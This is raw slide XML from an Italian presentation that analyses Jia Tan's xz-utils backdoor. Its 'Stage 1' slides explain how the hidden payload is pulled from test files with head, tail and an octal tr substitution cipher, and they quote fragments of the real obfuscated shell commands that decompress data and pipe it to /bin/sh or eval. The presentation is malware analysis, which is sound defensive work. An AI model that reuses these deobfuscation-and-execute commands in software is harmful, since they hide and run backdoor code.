              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene modello, tappeto, tessuto, monocromatico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFDC9EE-B936-2F01-55ED-1D9EDB48783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563"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="4556883"/>
            <a:ext cx="6096000" cy="1019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83218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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926087"/>
            <a:ext cx="11864247" cy="206210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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prende l'output precedente ed esclude i primi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Byte, invia il resto su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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766603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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1927018"/>
            <a:ext cx="11864247" cy="452431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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applica un cifrario di sostituzione in ottale che mappa array di Byte verso range 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 377</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 114</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 322</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 377</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>range da 50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" baseline="-25000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
